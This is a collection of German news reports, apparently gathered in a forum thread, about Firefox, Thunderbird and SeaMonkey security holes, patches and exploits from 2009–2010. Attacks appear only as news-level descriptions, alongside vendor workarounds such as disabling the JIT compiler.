Selbst im Dokument eingebettetes JavaScript wird mit CSP standardmäßig nicht mehr ausgeführt. Websites sollen dem Browser sogar signalisieren können, das Ausführen von JavaScript in ihrem Kontext komplett abzuschalten. Sinnvoll kann dies etwa auf Seiten sein, die gar keine Skripte enthalten.
Dennoch soll CSP vollständig rückwärtskompatibel sein. Sendet die Website keinen CSP-Header, fällt der Browser auf die alte Same Origin Policy zurück. Browser ohne CSP-Unterstützung ignorieren den zusätzlichen Header einfach. Darüber hinaus soll CSP auch Maßnahmen gegen ClickJacking bieten und automatisch von HTTP-Seiten auf HTTPS-Seiten umleiten, sofern diese verfügbar sind.
Google prüft derzeit ebenfalls, seine Dienste aus Sicherheitsgründen standardmäßig per HTTPS anzubieten, um das Ausspähen von Informationen zu verhindern. Wann CSP konkret in Mozilla-Produkte implementiert werden soll, schreibt Brandon Sterne, Security Program Manageren bei Mozilla, nicht.
Unterdessen haben die Entwickler Version 2.0.0.22 des E-Mail-Clients Thunderbird zum Herunterladen bereitgestellt. In dieser Version sind mehrere Sicherheitslücken beseitigt, die die Entwickler teilweise als kritisch eingestuft haben. Auch SeaMonkey ist mittlerweile in der überarbeiteten Fassung 1.1.17 verfügbar. In Firefox wurden die insgesamt elf Lücken bereits vor rund zwei Wochen behoben.
Quelle : www.heise.de (http://www.heise.de)
-
Ein auf dem Exploit-Portal Milw0rm erschienener Exploit für den Firefox 3.5 soll eine Sicherheitslücke demonstrieren, bei der durch eingeschleusten Code der Taschenrechner unter Windows startet. Zwar stürzte in einem ersten Test der heise-Security-Redaktion Firefox unter Vista nur ab, die Sicherheitsdienstleister Secunia und VUPEN bestätigten aber auf ihren Seiten, dass Angreifer mittels präparierter Webseiten einen PC infizieren können. Ursache des Problems ist ein Buffer Overflow bei der Verarbeitung präparierter Font-Tags.
Die Mozilla Foundation ist über das Problem informiert, die Anwort auf eine Anfrage von heise Security steht indes noch aus. Ein Update gibt es nicht. Bislang gibt es keine Meldungen, dass erste Seiten im Internet die Lücke aktiv für Infektionen von Windows-PCs ausnutzen würden. Da der Exploit zur Verteilung des Codes im Speicher des PC Heap Spraying mit JavaScript benutzt, kann man als Notbehelf JavaScript deaktivieren. Unter Windows 7 RC1 bot nach einem kurzen Stillstand des Browsers ein Dialog den Abbruch des Skripts an.
Siehe dazu auch:
* Mozilla Firefox Memory Corruption Vulnerability, Bericht von Secunia
* Mozilla Firefox Elements Handling Memory Corruption Vulnerability, Bericht von VUPEN
Quelle und Links : http://www.heise.de/newsticker/Erster-Zero-Day-Exploit-fuer-Firefox-3-5--/meldung/141976 (http://www.heise.de/newsticker/Erster-Zero-Day-Exploit-fuer-Firefox-3-5--/meldung/141976)
-
Abschaltung des Just-inTime-JavaScript-Compilers soll helfen
Nicht nur Microsoft kämpft im Moment mit Sicherheitslücken: auch Mozillas kürzlich fertig gewordener Firefox 3.5 hat eine Sicherheitslücke, die es ermöglicht dem Nutzer bösartigen Code unterzuschieben.
Mozillas Firefox 3.5 hat einen gefährlichen Fehler in dem JIT-JavaScript-Compiler. Dieser Fehler lässt sich laut Mozillas Sicherheitsblog nutzen um ein Opfer dazu zu bringen eine Webseite mit Schadcode anzusurfen, der dann auch ausgeführt wird.
Laut Mozilla lässt sich der Angriff abschwächen, wenn die Just-in-Time-Komponente der JavaScript-Engine abgeschaltet wird. Dazu gibt der Anwender in die Adresszeile about:config ein und gibt im Filter anschließend JIT ein. Nach einem Doppelklick auf die Zeile javascript.options.jit.content wechselt der Wert auf "false", womit einem Angriff zumindest temporär vorgebeugt werden kann.
Alternativ reicht es auch den Firefox im abgesicherten Modus des Browsers zu starten (Safe Mode). In diesem Fall wird die JIT-Komponente ebenfalls nicht genutzt. Allerdings wirkt sich die Abschaltung negativ auf die Geschwindigkeit der JavaScript-Engine aus.
Mozillas Entwickler arbeiten bereits an einem Patch für den Browser. Wann dieser erscheint, kann Mozillla derzeit jedoch nicht sagen.
Mozilla erwähnt bisher nur Firefox 3.5 als gefährdeten Browser.
Quelle : www.golem.de (http://www.golem.de)
-
Die Mozilla Foundation hat die gestern gemeldete kritische Lücke in Firefox 3.5 bestätigt und arbeitet an einem Update. Als Workaround empfiehlt der Hersteller, den Just-in-time-JavaScript-Compiler (JIT) zu deaktivieren. Dazu muss man in der Adresszeile des Browsers die URL "about:config" aufrufen und die Option javascript.options.jit.content auf "false" setzen. Allerdings endet mit dieser Umkonfiguration möglicherweise die Gewährleistung, worauf ein Dialog beim Aufruf der Firefox-Konfiguration hinweist. Nur wer artig verspricht, vorsichtig zu sein, darf weitermachen.
(http://www.heise.de/bilder/142066/0/1)
Nach der Umkonfiguration ist man zwar erstmal auf der sicheren Seite, allerdings laufen nun JavaScripte erheblich langsamer. Sobald das Update verfügbar und installiert ist, stellt man den Wert einfach wieder auf "true". Alternativ können Windows-Anwender auch den Firefox im Safe Mode starten, dann nämlich wird JIT ebenfalls deaktiviert.
Quelle : www.heise.de (http://www.heise.de)
-
Eine vor vier Tagen bekannt gewordene Sicherheitslücke in Firefox 3.5 betrifft auch den inzwischen veröffentlichten aktuellen Firefox 3.5.1. Dabei übergibt ein JavaScript einen überlangen Unicode-String an die document.write()-Methode, die einen Puffer überlaufen lässt. Dies kann dazu führen, dass ein Angreifer beliebigen Code ausführen kann; falls das nicht klappt, wird der Browser vermutlich abstürzen.
(http://www.heise.de/bilder/142201/0/1)
Ein überlanger Unicode-String bereitet Firefox ernste Sicherheitsprobleme.
SecurityFocus demonstriert dies anhand eines einfachen Exploits. Auch IBM Internet Security Services und die National Vulnerability Database stufen die Lücke als kritisch ein. Außer dem für die meisten Webanwender wenig praktikablen Vorschlag, JavaScript abzuschalten, gibt es derzeit keine Abhilfe gegen diese Sicherheitslücke.
Quelle : www.heise.de (http://www.heise.de)
-
Die Mozilla Foundation hat die Firefox-Version 3.0.12 vorgelegt, in der zahlreiche kritische Sicherheitslücken beseitigt sind. Dazu gehören Fehler in Zusammenhang mit dem Flash Player und SVG-Elementen, die Angreifer das Einschleusen und Ausführen von Code über präparierte Webseiten ermöglichen. Zudem kann das Rendern bestimmter Fonts zu einen Heap Overflow führen.
Darüber hinaus führen mehrere Speicherfehler zum Absturz des Browsers. Allerdings gibt es Hinweise darauf, dass sich darüber auch Code einschleusen und ausführen lässt. Die Entwickler gehen in solchen Fällen auf Nummer sicher und stufen auch solche potenziellen Lücken als kritisch ein. Daneben haben die Entwickler die Stabilität verbessert, so dass nun unter anderem Firefox bei Verwendung das Java-Plug-ins für Windows nicht mehr zeitweise einfriert.
Offiziell wird Firefox 3.0.x nur noch bis Januar 2010 mit Sicherheits-Updates versorgt. Anwender sollten bereits jetzt überlegen, auf die aktuelle Version der 3.5.x-Serie des Webbrowsers zu wechseln.
Anders als bei bisherigen Sicherheitsberichten sind diesmal SeaMonkey und Thunderbird nicht erwähnt, wobei allerdings unwahrscheinlich ist, dass zumindest SeaMonkey nicht betroffen sein soll.
Siehe dazu auch:
* Security Advisories for Firefox 3.0 (http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.12)
* Firefox 3 - Versionshinweise (http://www.mozilla-europe.org/de/firefox/3.0.12/releasenotes/)
Quelle : www.heise.de (http://www.heise.de)
-
In den aktuellen Versionen von Firefox ist eine neue Sicherheitslücke entdeckt worden, die Phishing-Angriffe erleichtern kann. Auch ältere Browser-Versionen sind anfällig. Mozilla arbeitet bereits an einem Sicherheits-Update.
Spoofing-Lücke in Firefox
In allen aktuellen Version von Firefox steckt eine Schwachstelle, die es einem Angreifer ermöglichen kann eine neue Seite in einem neuen Tab oder Fenster zu laden, deren Herkunft er fälschen kann. Es handelt sich um eine so genannte Spoofing-Lücke. Mozilla ist über die Sicherheitslücke informiert und hat die Ursache des Problems bereits gefunden. Ein Update für Firefox 3.5.1 und 3.0.12 wird derzeit getestet.
Eine erfolgreiche Ausnutzung der Schwachstelle kann einen Phishing-Angriff recht überzeugend machen. Die Ausnutzung ist recht einfach. Dazu wird ein neues Fenster (oder Tab) geöffnet, dessen Zieladresse nicht existiert. Mitten in diesem Vorgang wird der Inhalt der Seite per Javascript manipuliert. Beispiel-Code für die Ausnutzung der Sicherheitslücke ist öffentlich verfügbar.
Im Mozilla Security Blog heißt es dazu, Benutzer hätten keine Möglichkeit, die Richtigkeit der Adressenangabe in der URL-Leiste zu überprüfen. Zur Vermeidung eines Phishing-Angriffs sollten Anwender vertrauliche Informationen wie Anmeldedaten nicht in Seiten eingeben, die durch Anklicken eines Links auf einer nicht vertrauenswürdigen Seite geöffnet werden.
Die Mozilla-Entwickler haben bereits eine Lösung für das Problem gefunden und in die Quelltexte von Firefox eingearbeitet. Wann ein Sicherheits-Update für Firefox bereit gestellt wird, ist derzeit noch ungewiss. Firefox 3.5.2 und 3.0.13 sind ohnehin für Anfang August angekündigt und werden wohl auch diese Lücke schließen.
Quelle : www.pcwelt.de (http://www.pcwelt.de)
-
Auf der Black Hat 2009 US berichten Experten von einer neuen Attacke, um per manipulierten SSL-Zertifikat Schadcode in eine Anwendung einzuspeisen.Laut einer Meldung (http://www.securityfocus.com/bid/35891/info) von Security Focus sind folgenden Anwendungen betroffen:
* Firefox (bis einschließlich 3.0.12)
* Seamonkey (bis einschließlich 1.0.8 )
Nicht betroffen ist die neuste Firefox Generation Version 3.5.x. Die Sicherheitslücke erlaubt einem Angreifer mittels manipulierten SSL-Zertifikaten das Auslösen eines Heap-basierten Pufferüberlaufs. Es besteht daher die Chance, dass Code in ein betroffenes System eingespeist wird. Für beide Anwendungen stehen bereits Updates zu Verfügung.
Quelle : www.tecchannel.de (http://www.tecchannel.de)
-
Die Mozilla Foundation hat neue Versionen ihres Firefox-Browsers vorgelegt, die im 3.5er-Zweig vier und im 3.0er-Zweig drei Sicherheitslücken beseitigen. Unter anderem kann ein Angreifer JavaScript mit den höchsten Rechten (Chrome) im Browser ausführen. Zudem deuten Abstürze in bestimmten Situationen auf möglicherwiese ausnutzbare Speicherfehler hin, die die Entwickler wie üblich sicherheitshalber als kritisch einstufen.
Darüber hinaus nehmen die Updates Betrügern eine Möglichkeit, mit Funktionaufrufen von window.open auf ungültige URLs und anschließendenm document.write eine manipulierte Webseite als SSL-geschützt anzuzeigen. Phisher könnten dies zum Klau von Daten missbrauchen. Außerdem beseitigen die aktuellen Versionen des Webbrowsers einen Fehler bei der Verarbeitung von SOCKS5-Anworten mit mehr als 15 Zeichen langen DNS-Namen.
Nachträglich hat die Foundation Fehlerbeschreibungen zu zwei längst in Firefox 3.5 geschlossenen Schwachstellen in Zusammenhang mit der Verarbeitung von SSL-Zertifikarten veröffentlich, die indes im Firefox 3.0.x weiter offen sind – und es wohl noch bleiben. Details zu den Lücken hatte Moxie Marlinspile auf seinem kürzlich gehaltenem Black-Hat-Vortrag enthüllt. Durch das Einfügen von Nullzeichen in Zertifikaten denken viele Browser, dass etwa das auf www.paypal.com (http://www.paypal.com)�.thoughtcrime.org ausgestellt Zertifikat zu www.paypal.com (http://www.paypal.com) gehört. Der Mozilla-Fehlerbericht weist darauf hin, dass sich auf diese Weise auch der gesicherte Update-Mechanismus von Firefox aufbrechen ließe. Ein Update-Angriffstool wurde auf der Black Hat bereits vorgestellt.
Marlinspike hatte das Problem wohl parallel zu Dan Kaminsky gefunden. Kaminsky hatte aber offenbar zusammen mit dem Microsoft Vulnerability Research an einer koordinierten Lösung des Problems gearbeitet, da neben Firefox auch der Internet Explorer und andere Browser betroffen sind. Nebenbei hatte Marlinspike noch einen Heap Overflow bei der Verarbeitung von präparierten Zertifikaten entdeckt, durch den sich Code einschleusen und ausführen lässt. Davon sind auch Thunderbird und SeaMonkey betroffen sein. Ob die Fehler dort behoben sind, lässt der Bericht offen. Der Bericht gibt nur an, dass der Fehler auch in den Network Security Services (NSS) 3.12.3 korrigiert wurde.
Auf jeden Fall empfiehlt die Mozilla Foundation Anwendern des Firefox 3.0.x, schon jetzt auf 3.5.x zu wechseln. Ohnehin endet der Support für den Vorgänger im Januar 2010.
Quelle : www.heise.de (http://www.heise.de)
-
Die Mozilla Foundation hat die Firefox-Versionen 3.0.14 und 3.5.3 vorgelegt, die mehrere kritische Sicherheitslücken der Vorgängerversionen beseitigen. Ein Fehler im FeedWriter ermöglicht es einem Angreifer, seinen JavaScript-Code im Browser des Opfers mit Chrome-Rechten auszuführen – also mit den höchsten Rechten. Zudem lässt sich ein Fehler in der Verwaltung der Spalten von XUL-Baumelementen zur Manipulation von Zeigern ausnutzen, mit denen sich eingeschmuggelter Code starten lässt. Dazu genügt der Besuch einer präparierten Webseite durch das Opfer.
Darüber hinaus beseitigen die neuen Versionen insgesamt sieben möglicherweise ausnutzbare Speicherfehler, die die Entwickler wie üblich sicherheitshalber als kritisch einstufen. Des Weiteren haben die Entwickler eine potenzielle Spoofing-Schwachstelle bei der Darstellung von URLs mit bestimmten Unicodes beseitigt. Version 3.0.14 korrigiert noch einen Fehler bei der Installation respektive Deinstallation von PKCS#11-Modulen zum Zugriff auf kryptografische Token. Offenbar waren die Dialoge nicht eindeutig genug, sodass ein Angreifer ein Opfer dazu bringen konnte, ein manipuliertes Modul zu installieren.
Beide Firefox-Versionen warnen beim Start nun auch bei veralteten Versionsständen des Flash-Plugins. Ein Großteil der Anwender surft mit verwundbaren Versionen von Adobe Flash im Netz und bietet so ein hervorragendes Ziel für Kriminelle, fand zuletzt der Sicherheitsdienstleister Trusteer heraus. Möglicherweise ändert sich die Lage damit. Auf jeden Fall empfiehlt die Mozilla Foundation Anwendern des Firefox 3.0.x, schon jetzt auf 3.5.x zu wechseln. Ohnehin endet der Support für den Vorgänger im Januar 2010.
Quelle : www.heise.de
-
Dass rund 80 Prozent der Anwender mit verwundbaren Flash-Installationen im Netz unterwegs sind und damit Kriminellen ein Einfallstor in ihren Windows-PC bieten, haben übereinstimmend die Analysen mehrerer Sicherheitsdienstleister in den vergangenen Wochen ergeben. Möglicherweise könnte die Mozilla Foundation mit der Warnung vor verwundbaren Plug-ins in den neuesten Versionen ihres Firefox-Browsers das Ruder nun herumreißen und dafür sorgen, dass Anwender häufiger Sicherheits-Updates installieren.
Nach Angaben von Ken Kovash von der Mozilla Foundation haben seit der Veröffentlichung von Firefox 3.0.14 und 3.5.3 mehr als 10 Millionen Anwender den Link zu Adobes Update-Seiten angeklickt. Ob sie dann allerdings wirklich das Flash-Update installiert haben, ist aus der Statistik noch nicht ersichtlich.
Firefox prüft mittels eines Skripts auf der Seite "Was gibt's Neues?", welche Version des Plugins installiert ist und warnt gegebenenfalls den Anwender. Die Seite wird nach jedem Update des Web-Browsers beim ersten Start automatisch aufgerufen. Am Tag des Updates auf die Version 3.5.3 wurde die Seite rund 6 Millionen Mal aufgerufen, etwas mehr als 3 Millionen hatten ein veraltetes installiert. Insgesamt registriert die Mozilla Foundation immerhin bei 75 Prozent aller Besucher von Mozilla-Seiten eine ältere Plugin-Version.
(http://www.heise.de/bilder/145436/0/1)
Besonders beeindruckend findet Kovash die sogenannte Click-Through-Rate der Warnseite, also wie viel Anwender letztlich der Aufforderung folgten, Adobes Seite zu besuchen: im Mittel 30 Prozent. Sonst weist die Seite "What's new" nur eine Click-Through-Rate von 5 Prozent auf. Die erfreulichen Zahlen sollten jedoch nicht darüber hinwegtäuschen, dass rund 70 Prozent der Anwender der Aufforderung zum Update nicht folgten.
Laut einem Blogeintrag von Johnathan Nightingale überlegt die Mozilla Foundation weitere Plugins in die webbasierte Überprüfung einzubeziehen und bei veralteten Versionsständen zu warnen sowie einen Link zum Update anzubieten. Neben Flash nutzen Kriminelle aktuell auch Lücken in QuickTime, Java und Adobe Reader, um einen PC zu kompromittieren. Mit dem zentralen Warndienst käme die Mozilla Foundation der im Kommentar auf heise Security "Mein Wunschzettel für Windows 7: Updates für Alle (http://www.heise.de/security/Mein-Wunschzettel-fuer-Windows-7-Updates-fuer-Alle--/artikel/138271)" geforderten Funktion ziemlich nahe. Anwender anderer Browser blieben aber leider außen vor.
Quelle : www.heise.de
-
Mehrere Fehler erlauben Angreifern, eigenen Code auszuführen
Mozilla schließt mit der Version 3.5.6 von Firefox drei kritische Sicherheitslücken. Zudem soll die Stabilität des Browsers mit dem Update verbessert und weitere sicherheitsrelevante Fehler beseitigt werden.
Geschlossen wurden in Firefox 3.5.6 unter anderem einige Fehler in der Browser-Engine (Mozilla Foundation Security Advisory 2009-65), die zu Abstürzen führen und Angreifern gegebenenfaklls die Möglichkeit eröffnen können, eigenen Code auf fremden Systemen auszuführen.
Ein weiterer Fehler steckt in der Bibliothek liboggplay, die Firefox seit der Version 3.5 zur Wiedergabe von Audio- und Videoinhalten mitbringt (Mozilla Foundation Security Advisory 2009-66). Auch über diesen Fehler kann Code eingeschleust und ausgeführt werden, warnt Mozilla.
Bei der dritten schweren Sicherheitslücke handelt es sich um einen Integer-Überlauf in der Bibliothek für Theora-Video (libtheora). Mit einem entsprechend präparierten Video ist es dadurch ebenfalls möglich, beliebigen Code auf fremden Systemen auszuführen (Mozilla Foundation Security Advisory 2009-67). Entdeckt wurde die Schwachstelle vom Sicherheitsexperten Dan Kaminsky.
Allein aufgrund dieser Schwachstellen ist ein Update auf die neue Version dringend anzuraten. Darüber hinaus wurden weitere Sicherheitsprobleme beseitigt und die Stabilität von Firefox verbessert. Firefox 3.5.6 steht ab sofort für Windows, Linux und Mac OS X unter mozilla.com zum Download bereit.
Quelle : www.golem.de
-
Die Version 3.5.7 des Webbrowsers Firefox löst ein in der Vorgängerversion eingeführtes Problem im Zusammenhang mit HTTP-Proxys. Durch das Schließen einer Schwachstelle (NTLM-Replay-Attacke) im Zusammenhang mit Authentifizierungen per NTLM versagte die Version 3.5.6 die Zusammenarbeit mit Web-Proxys, die eine Nutzer-Authentifizerung erforderten. Insbesondere in einigen Firmennetze war dann mit Firefox kein Zugriff auf das Internet mehr möglich. Abhilfe brachte, über die Konfiguration via about:config die Einstellung network.auth.force-generic-ntlm auf true zu setzen. Ursache des Problems war offenbar ein Fehler bei der Namensauflösung.
Darüber hinaus korrigiert Version 3.5.7 noch die Art wie Meldungen zu Updates auf Major-Release angezeigt werden und erhöht die Stabilität. Zusätzlich ist Firefox 3.0.17 erschienen, der die gleichen Änderungen wie 3.5.7 enthält.
Quelle : www.heise.de
-
Schwachstellen in Webbrowsern und deren Ausnutzung durch Cyberkriminelle sind nichts Neues. Sehr wohl neuartig ist aber eine Variante, die momentan Benutzer des Mozilla Firefox heimsucht: Angriff über den Browser - auf IRC-Netzwerke!
Experten sprechen vom weltweit ersten "inter-protocol exploit". Bisher zielten derartige Angriffe entweder auf das unsichere Programm selbst oder gleich auf das komplette Betriebssystem. Das Vorgehen, IRC über den Webbrowser anzugreifen, ist dagegen neuartig.
Firefox bietet die Möglichkeit, auch IRC-Netze über den Webbrowser zu besuchen. Dies wird im vorliegenden Angriffsszenario ausgenutzt. Der Browser wird mit Hilfe von Javascript-Code in manipulierten Links gezwungen, IRC-Netze zu betreten. Dort wird ein ebenso manipulierter Link in zahlreiche Channels gespammt. Wer mit Firefox im IRC ist und einem dieser Links folgt, dessen Browser fängt ebenfalls an, entsprechende Links zu verbreiten.
Dadurch, dass sich der Angriff auf diese Art und Weise effizient weiterverbreitet, richtet er in den betroffenen IRC-Netzen einiges an Chaos an. "Eine große Anzahl von Nutzern des Netzes Freenode wurde gebannt, weil sie den Link klickten und dann ins IRC kamen und dort Spam verbreiteten," erzählte einer der Angreifer, der unter dem Pseudonym Weev auftrat, gegenüber dem IT-Newsportal The Register (http://www.theregister.co.uk/2010/01/30/firefox_interprotocol_attack/). Teilweise sollen sich die Freenode-Admins sogar gegenseitig gebannt haben.
Die Schwachstelle scheint auf allen Firefox-Versionen zu funktionieren. Auf die Möglichkeit angesprochen, auch andere Browser anzugreifen, meinte "Weev", auf Microsoft Internet Explorer und Apple Safari würde der Angriff nicht funktionieren. Bei anderen Browsern sei es dagegen "möglich", dass es ihnen gelingen würde, den Angriff erfolgreich zu portieren. Einzelheiten über den Angriff schreiben die Verantwortlichen auch im Internet (http://encyclopediadramatica.com/Firefox_XPS_IRC_Attack).
Im Freenode-Netz kämpft man noch immer mit den Folgen des Angriffs. Andere Netze wie Efnet und OFTC haben dagegen mittlerweile wirksame Gegenmaßnahmen gefunden.
Sicherheitsexperten warnen Benutzer, beim Klicken von Links besondere Vorsicht walten zu lassen. Grundsätzlich sind einige Experten der Ansicht, dass Webbrowser "nicht in der Lage sein sollten, zu anderen als den HTTP-Ports zu verbinden". Diese Beschränkung auf wesentliche Funktionen könnte Sicherheitsprobleme verringern.
Von der für Firefox verantwortlichen Mozilla Foundation gibt es noch keine Stellungnahme. Auch über einen eventuellen Patch ist noch nichts bekannt.
Die Berichte über Browser-Schwachstellen scheinen derzeit nicht abzureißen. Erst kürzlich war der Microsoft Internet Explorer mit einer ganzen Serie von Schwachstellen, von denen einige momentan noch nicht behoben sind, in den Schlagzeilen.
Quelle : www.gulli.com
-
Die Rechner einiger tausend Nutzer des Open Source-Browsers Firefox wurden mit Malware infiziert, die über zwei Addons verbreitet wurde. Das hat Mozilla, unter deren Dach der Browser entwickelt wird, nun bestätigt.
Die infizierten Zusatzmodule wurden über die offizielle Download-Seite für Addons verbreitet. Inzwischen habe man sie aus der Datenbank entfernt, hieß es. Sowohl der Sothink Web Video Downloader 4.0 also auch das Plugin Master Filer beinhalteten einen Trojaner, der Windows-PCs übernimmt.
Die beiden Addons konnten über den "Experimental"-Bereich heruntergeladen werden. Dort laufen alle neueren Module auf, die noch nicht den öffentlichen Prüf-Prozess durchlaufen haben. Um die Software aus diesem Teil der Datenbank installieren zu können, müssen Nutzer gesondert zustimmen.
Die betroffenen Fassungen von Master Filer wurden insgesamt 600 mal heruntergeladen, bevor die Infektion entdeckt und der Download deaktiviert wurde. Für den Sothink Web Video Downloader 4.0 verzeichnete man insgesamt rund 4.000 Downloads.
Laut Mozilla durchlaufen alle hochgeldenen Plugins einen automatisierten Check durch Virenscanner. Diese hätten aber in diesen beiden Fällen versagt. Entdeckt wurde die Malware, nachdem man ein zusätzliches Prüfverfahren installierte und auch alle älteren Addons noch einmal scannen ließ.
Mozilla empfielt Nutzern, die eines der beiden Addons geladen haben, dieses zu deinstallieren. Zusätzlich sollte die Festplatte mit einem aktuellen Virenscanner überprüft werden.
Quelle : http://winfuture.de
-
Nur ein von zwei experimentellen Addons ist tatsächlich von Trojaner befallen
Das Sothink-Addon Version 4 ist ab sofort wieder von der Mozilla-Webseite zum Download verfügbar. Zuvor hatte ein Fehlalarm eines Virenscanners fälschlicherweise darin einen Trojaner aufgespürt.
In einem Blogeintrag von Ende letzter Woche erklärten Mozilla-Entwickler, sie hätten in zwei als experimentell eingestuften Addons Trojaner entdeckt und sie von der Webseite entfernt. In dem Addon Sothink Video Downloader Version 4 befand sich jedoch keine Schadsoftware, wie das Sicherheits-Team um addons.mozilla.org (AMO) nun in seinem Blog vermerkt. Allerdings war das andere monierte Addon tatsächlich mit dem Trojaner Win32.Bifrose.32.Bifrose infiziert.
Zusammen mit Mitarbeitern der Firma McAfee hatten AMO-Mitarbeiter die Trojaner-Meldung im Sothink-Addon als False Postitiv entlarvt. Daraufhin stellten sie das fragliche Addon wieder auf ihrer Webseite zum Download zur Verfügung. In dem Blog entschuldigt sich das AMO-Team bei den Entwicklern des Addons und den Benutzern für das Malheur und korrigiert die Anzahl der betroffen Benutzer von 6.000 herunter auf 700.
Quelle : www.golem.de
-
Die Entwickler der Mozilla Foundation haben ein Update für den Browser Firefox veröffentlicht. Mit den Versionen 3.0.18 sowie 3.5.8 werden Stabilitätsprobleme beseitigt und Sicherheitslücken geschlossen.
Insgesamt fünf sicherheitsrelevante Probleme werden in den Release Notes (3.0.18, 3.5.8) angegeben. Drei Lücken werden von Mozilla als kritisch eingestuft, da sie genutzt werden könnten, um schadhaften Code auszuführen. Die anderen beiden Lücken werden als "moderate" eingestuft und ermöglichen Cross-Site-Scripting.
Neben den Sicherheitslücken wurden in den beiden Versionen auch Stabilitätsupdates integriert. Eine komplette Liste der behobenen Bugs findet man hier. Größtenteils handelt es sich um Fehler, die bereits mit der aktuellen Version Firefox 3.6 beseitigt wurden. Aus diesem Grund liegt für diese Ausgabe auch kein Update vor.
Die neuen Versionen können wie immer direkt heruntergeladen werden. Alternativ steht der Patch über die integrierte Update-Funktion zur Verfügung, die innerhalb von 48 Stunden anspringen sollte. Die Suche lässt sich aber auch manuell auslösen.
Quelle : http://winfuture.de
-
Der russische Sicherheitsdienstleister Intevydis hat seinen Kunden einen Windows-Exploit für eine bislang unbekannte Sicherheitslücke in Firefox 3.6 zur Verfügung gestellt. Der Exploit erlaubt Angreifern aus der Ferne, die Kontrolle über einen PC zu bekommen. Intevydis ist der Hersteller des kommerziellen Add-ons VulnDisco für das ebenfalls kommerzielle Exploit-Toolkit Canvas des Herstellers Immunity. Der Entwickler Evgeny Legerov preist (https://forum.immunityinc.com/board/thread/1161/vulndisco-9-0/?page=1#post-1165) seinen Exploit für Windows XP (SP3) und Vista im Partner-Forum von Immunity als ziemlich zuverlässig an. Es sei eine Herausforderung gewesen, den Fehler – ein Buffer Overflow – zu finden und auszunutzen.
Das Posting stammt zwar von Anfang Februar, da es aber bislang keine Updates für Firefox 3.6 gab, dürfte die Lücke noch offen sein. Secunia stuft das Problem in seinen Advisories als kritisch ein, hält aber keine weiteren Informationen bereit. Mittlerweile ist die Mozilla Foundation auf das Problem aufmerksam geworden, hat aber noch keine offizielle Stellungnahme dazu veröffentlicht. Ob der Exploit bereits weitere Verbreitung gefunden hat oder im größeren Stil ausgenutzt wird, ist nicht bekannt. Allerdings gibt es nach Analysen des Blogs Extraexploit eine signifikante Häufung von Abstürzen des Firefox 3.6 am 12. und 13. Februar. Unklar ist, ob dies in Zusammenhang mit Tests des Exploit steht. Welche Seiten die häufigsten Abstürze verursachen, ist in den Mozilla Crash Reports (http://crash-stats.mozilla.com/topcrasher/byurl/Firefox/3.6) zu sehen.
Ganz nebenbei weist Legerov auch noch auf Zero-Day-Exploits für Lotus Notes 8.5/8.5fp1 sowie für den RealPlayer 11 hin. Der Exploit für den RealPlayer ist eine überarbeitete Fassung eines zwei Jahre alten Exploits, der eine erst vor kurzem geschlossene Lücke im RealPlayer ausnutzt.
Quelle : www.heise.de
-
An der Existenz der gemeldeten Sicherheitslücke in Firefox 3.6 gibt es inzwischen erste Zweifel. Ein weiterer Experte hat den veröffentlichten Exploit-Code mit Firefox 3.6 und 3.5.8 sowohl unter Windows XP SP3 als auch Windows Vista SP2 ohne Erfolg getestet.
Er geht davon aus, dass es sich um eine Falschmeldung handelt, die sogar von Sicherheitsfirmen wie Secunia ohne eigenen Test weiterverbreitet wurde. Es sei auch eine guter Werbegag für die Sicherheitssoftware Vulndisco.
Von Mozilla selbst gibt es bisher nur eine Reaktion, in die Veröffentlichung der Sicherheitslücke leicht kritisiert wird. Anscheinend wurde Mozilla überhaupt nicht kontaktiert. Eine Bestätigung der Lücke steht aber nach wie vor aus.
Quelle : www.gamestar.de
-
Mozillas Browser ist gegen Angriffe anfällig. In der Version 3.6 gibt es ein Sicherheitsproblem, das es dem Angreifer erlaubt, Schadcode auszuführen. Eine Betaversion, die die Sicherheitslücke schließt, steht bereit.
Mozillas Firefox 3.6 hat offenbar ein schwerwiegendes Sicherheitsproblem, wie die Entwickler im Mozilla Security Blog bestätigen (http://blog.mozilla.com/security/). Viele Details zu dem Sicherheitsproblem, das auch bei Secunia gelistet ist (http://secunia.com/advisories/38608/), gibt es noch nicht. Offenbar hat den Fehler Evgeny Legerov entdeckt und das Mozilla-Team mittlerweile mit genügend Informationen versorgt, damit Firefox gepatcht werden kann.
Mit dem Fehler ist es möglich, Firefox abstürzen zu lassen und anschließend Schadcode auszuführen. Der Entdecker des Bugs verkauft diesen bereits in einem Sicherheitspaket, so dass er wohl im Umlauf sein dürfte und von Legerovs Kunden zumindest ausprobiert wird.
Die Qualitätssicherung des Mozilla-Teams testet Firefox 3.6.2 bereits. Die fertige Version soll am 30. März 2010 erscheinen. Wer nicht so lange warten möchte, kann die Beta herunterladen (https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.6.2-candidates/build3/), die den Nutzer bereits absichern soll, aber noch einige Fehler enthalten dürfte.
Quelle : www.golem.de
-
Die Mozilla-Foundation hat Version 3.6.2 ihres Open-Source-Webbrowsers Firefox herausgebracht. Firefox 3.6.2 schließt laut den Entwicklern neben anderen Lecks vor allem eine schwerwiegende Lücke, die seit Februar bekannt war, zu der Details aber erst seit kurzem verfügbar sind. Die Entwickler hatten die neue Firefox-Version zwar erst für den 30. März angekündigt, sie aber nun dich schneller fertig gestellt – unter anderem, weil der Sicherheitsdienstleister Secunia die Lücke als hochkritisch eingestuft hat.
Die Lücke erlaubte Angreifern aus der Ferne, die Kontrolle über einen PC zu bekommen. Bekannt wurde die Sicherheitslücke, als der russische Sicherheitsdienstleister Intevydis seinen Kunden einen Windows-Exploit dafür zur Verfügung stellte. Intevydis verhält sich gegenüber Herstellern, in deren Produkten sie Sicherheitslücken entdecken, wenig auskunftsfreudig, und verkauft sein Wissen. Der Entdecker Evgeny Legerov hatte mit seinem Fund zunächst angegeben ohne Details zu nennen, später aber die Mozilla-Entwickler kontaktiert.
Versionen vor Firefox 3.6 waren von dem Problem nicht betroffen. Die Lücke hatte das vom BSI betriebene Bürger-CERT aber dazu veranlasst, eine Warnung herauszugeben: Bis zum Erscheinen von Firefox 3..6.2 solle man lieber "alternative Browser" einsetzen. Diese Warnung löste aber unter Sicherheitsexperten auch Befremden aus – siehe dazu den Kommentar auf heise Security: "Sicherheit nach Behördenart".
